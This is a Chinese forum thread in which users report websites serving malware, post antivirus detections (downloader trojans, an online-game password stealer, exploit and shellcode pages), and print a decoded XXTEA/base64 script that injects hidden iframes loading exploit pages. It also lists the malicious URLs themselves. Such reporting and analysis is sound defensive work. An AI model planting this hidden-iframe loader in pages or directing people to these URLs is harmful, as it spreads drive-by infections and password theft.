毒网

yitp

http://dfjh.dongfeng.net/

yitp

卡巴报下载

wanglaoban

http://www.5ibsj.com/kk/wm.htm
KAV6 - detected: Trojan program Trojan-Downloader.JS.Agent.gm        File: C:\Downloads\wm.htm

wanglaoban

http://www.5ibsj.com/kk/xp14.htm
http://www.5ibsj.com/kk/xppp.htm
http://www.mpc88.com/mc/kg.exe
kav6 - detected: Trojan program Trojan-PSW.Win32.OnLineGames.eop        File: C:\Downloads\kg.exe

pmj_sh

检测到病毒: Trojan-Downloader.JS.Agent.gm
文件: wm[1].htm

检测到病毒: Trojan-Downloader.JS.Psyme.qj
文件: xp14[1].htm

孤独更可靠

XXTEA+base64加密

解后得:

<SCRIPT language="javascript">
document.write("<i"+"frame style='display:none;' src=xp14.htm width=10 height=10

frameborder=0></i"+"frame>");
document.write("<i"+"frame style='display:none;' src=xppp.htm width=10 height=10

frameborder=0></i"+"frame>");
</SCRIPT>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>

[:27:]

下面那2个子框架无法执行

rasis

xp14.htm
      [DETECTION] Contains suspicious code HEUR/Exploit.HTML

xppp.htm
      [DETECTION] Contains detection pattern of the HTML script virus HTML/Shellcode.Gen

kg.exe
      [DETECTION] Is the Trojan horse TR/CrashSystem.C

曲中求

看了一下。。

a256886572008

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Trojan.DL.Script.VBS.Agent.xgp

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.17.01